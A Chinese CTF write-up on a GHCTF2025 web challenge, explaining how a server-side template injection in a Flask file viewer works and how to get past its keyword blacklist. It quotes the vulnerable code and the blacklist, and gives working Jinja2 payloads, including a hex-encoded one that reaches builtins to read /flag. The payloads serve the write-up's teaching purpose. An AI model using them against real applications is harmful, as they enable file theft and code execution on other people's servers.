GHCTF2025-WEB题解:如何用SSTI绕过WAF黑名单(附实战payload)

从GHCTF2025实战出发:深度拆解SSTI黑名单绕过策略与高阶Payload构造

最近在GHCTF2025的WEB赛道上,一道看似简单的文件上传题目,却让不少选手陷入了“知道有洞,但payload总被拦截”的困境。这道题表面上是文件上传,实际上却是一场针对SSTI(服务器端模板注入)绕过能力的深度考验。我在实际测试中发现,很多选手能够快速识别出SSTI漏洞的存在,但在面对严格的黑名单过滤时,却往往束手无策,反复尝试的payload都被WAF无情拦截。

这种情况在真实的渗透测试和CTF比赛中并不少见。WAF(Web应用防火墙)的过滤规则越来越智能,传统的{ {7*7}}测试虽然能确认漏洞,但真正要执行命令、读取文件时,那些包含osflag__builtins__等关键词的payload几乎都会被第一时间拦截。这道题的精妙之处在于,它模拟了一个相对真实的防御环境——不仅过滤常见敏感词,还对下划线这种在Python反射中至关重要的字符进行了拦截。

本文将从实战角度出发,不局限于GHCTF2025这一道题目,而是系统性地探讨SSTI黑名单绕过的核心思路、技术原理和进阶技巧。我会结合自己多次踩坑的经验,分享几种真正有效的绕过方法,并深入分析每种方法背后的Python/Jinja2特性。无论你是CTF新手,还是有一定经验的安全爱好者,相信都能从中获得实用的技术提升。

1. 理解题目环境与WAF过滤机制

在开始构造绕过payload之前,我们必须先彻底理解题目设置的防御环境。很多选手失败的原因不是技术不行,而是没有仔细分析过滤规则,盲目尝试各种已知的payload。

1.1 代码审计:识别真正的攻击面

题目虽然以文件上传为入口,但通过代码审计可以发现,上传功能本身被严格限制:

ALLOWED_EXTENSIONS = {'txt', 'log', 'text','md','jpg','png','gif'} def allowed_file(filename): return '.' in filename and \ filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS 

这是典型的白名单过滤,只允许特定扩展名的文件。更重要的是secure_filename()函数的使用,它会清理文件名中的特殊字符,防止路径遍历等攻击。真正的漏洞点在于文件查看功能:

tmp_str = """<!DOCTYPE html> <html lang="zh"> <head>...</head> <body> <h1>文件内容:{name}</h1> <pre>{data}</pre> </body> </html>""".format(name=safe_filename, data=file_data) return render_template_string(tmp_str) 

这里的关键是render_template_string()函数,它将用户控制的文件内容直接渲染为模板。如果文件内容包含Jinja2模板语法,就会被执行。

1.2 WAF黑名单分析

题目中的WAF实现相对简单但有效:

def contains_dangerous_keywords(file_path): dangerous_keywords = ['_', 'os', 'subclasses', '__builtins__', '__globals__', 'flag',] with open(file_path, 'rb') as f: file_content = str(f.read()) for keyword in dangerous_keywords: if keyword in file_content: return True return False 

这个过滤列表设计得相当有针对性:

过滤关键词在SSTI中的作用绕过难度
_属性访问分隔符、双下划线前缀
os执行系统命令的关键模块
subclasses获取子类链的核心方法
__builtins__内置函数和模块的入口
__globals__访问全局命名空间
flag目标文件名
注意:这里的过滤是内容检测,不是参数名检测。这意味着即使我们将payload放在URL参数中,只要文件内容包含这些关键词,就会被拦截。

1.3 初步测试与漏洞确认

在构造复杂payload之前,先用最简单的测试确认漏洞:

# 创建测试文件 echo '{ {7*7}}' > test.txt # 上传后访问 curl http://target/file/test.txt 

如果返回的页面中显示49而不是{ {7*7}},就确认了SSTI漏洞的存在。这个测试payload不包含任何黑名单关键词,所以能顺利通过WAF。

2. 基础绕过技术:编码与字符串操作

当直接使用敏感关键词被拦截时,最直接的思路就是不让这些关键词以明文形式出现。编码和字符串操作是绕过关键词过滤的经典方法。

2.1 十六进制编码绕过

Python和Jinja2都支持十六进制表示法,这为我们绕过关键词检测提供了可能。在Python字符串中,\x后跟两个十六进制数字表示一个字符。

原始payload(会被拦截):

{ { lipsum.__globals__.__builtins__.open('/flag').read() }} 

十六进制编码版本:

{ { lipsum["\x5f\x5fglobals\x5f\x5f"]["\x5f\x5fbuiltins\x5f\x5f"]["open"]("/fla\x67").read() }} 

Read more

Unity 无人机物理模拟开发日志:从零打造穿越机手感

Unity 无人机物理模拟开发日志:从零打造穿越机手感

Unity 无人机物理模拟开发日志:从零打造穿越机手感 摘要:本文记录了在 Unity 中构建一个高拟真 FPV 穿越机(Drone)物理模拟系统的过程。从基础的 PID 控制到引入空气动力学阻力、地面效应和电机惯性,一步步逼近真实的飞行手感。 环境:Unity 2022.3.57c1f1Window10 开源仓库地址 Unity引擎开发的无人机模拟系统 演示视频: Unity无人机仿真-bilbil 一、功能介绍 输入系统 最初的实现使用键盘鼠标控制,但这对于模拟穿越机来说完全不够。真实的穿越机需要细腻的模拟量输入。 核心物理引擎 Unity 的 Rigidbody 提供了基础物理,但要飞得像穿越机,必须手动计算力和力矩。 PID 控制器 (Rate Loop) 这是飞控的灵魂。我们实现了三个独立的 PID 控制器分别控制 Pitch、Roll 和 Yaw

【Windows安装openclaw,配置qwen模型和ollama本地模型,飞书群组添加机器人】

【Windows安装openclaw,配置qwen模型和ollama本地模型,飞书群组添加机器人】

Windows11安装OpenClaw,配置千问Qwen模型及配置服务器本地模型Ollama,接入飞书机器人 * 第一步、安装Nodejs * 第二步、安装Git * 第三步、安装Openclaw * 配置本地大模型 * 第四步、配置飞书 第一步、安装Nodejs 1、减少后续各种报错情况,先安装Nodejs,下载地址:https://nodejs.org/zh-cn/download,选择对应操作系统,24版本太新,有些依赖不适配,本文选择22.22.0版本,node-v22.22.0-x64.msi 直接双击安装即可。 2、安装完成看一下版本信息,用管理员权限打开win的PowerShell 3、执行 node -v 第二步、安装Git 1、安装Git 访问地址 https://git-scm.com/install/

ESP32-S3 做 AI 人脸追踪机器人

用 ESP32-S3 打造会“追人”的 AI 小机器人 🤖👀 你有没有想过,一个成本不到百元的开发板,也能做出能识别人脸、自动转头盯着你看的小机器人?听起来像科幻片?但它真的可以做到——而且核心就是那块我们常见的 ESP32-S3 。 别被它的价格骗了。这颗芯片虽然只有巴掌大、几十块钱,却藏着让人惊讶的潜力:双核处理器、支持AI指令集、能接摄像头、还能驱动舵机……把这些能力串起来,就能让一个小小的机器人“睁开眼睛”,学会看世界,并且主动追踪人脸。 今天,我们就来拆解这个项目背后的完整技术链路:从如何在资源紧张的MCU上跑通AI模型,到图像采集、推理计算、再到控制机械结构闭环响应——一步步教你打造属于自己的 AI人脸追踪机器人 。 为什么选 ESP32-S3?它真能跑AI吗? 很多人第一反应是:“AI不是得靠GPU或者树莓派那种高性能设备吗?ESP32 这种微控制器也能行?” 说实话,我一开始也怀疑过 😅。但当你深入了解 ESP32-S3 的设计细节后,你会发现——它确实是为“

【CANN】Pi0机器人大模型 × 昇腾A2 测评

【CANN】Pi0机器人大模型 × 昇腾A2 测评

【CANN】Pi0机器人大模型 × 昇腾A2 测评 * 写在最前面 🌈你好呀!我是 是Yu欸🚀 感谢你的陪伴与支持~ 欢迎添加文末好友🌌 在所有感兴趣的领域扩展知识,不定期掉落福利资讯(*^▽^*) 写在最前面 版权声明:本文为原创,遵循 CC 4.0 BY-SA 协议。转载请注明出处。 Pi0机器人VLA大模型测评 哈喽大家好呀!我是 是Yu欸。 最近人形机器人和具身智能真的太火了,大家都在聊 Pi0、聊 VLA 大模型。但是,兄弟们,不管是搞科研还是做落地,咱们始终绕不开一个问题——算力。 今天,我们一起把当下最火的 Pi0 机器人视觉-语言-动作大模型,完完整整地部署在国产算力平台上,也就是华为的昇腾 Atlas 800I A2 服务器上。 在跑通仓库模型的基础上,我们做一次性能测评。 我们要测三个最核心的指标: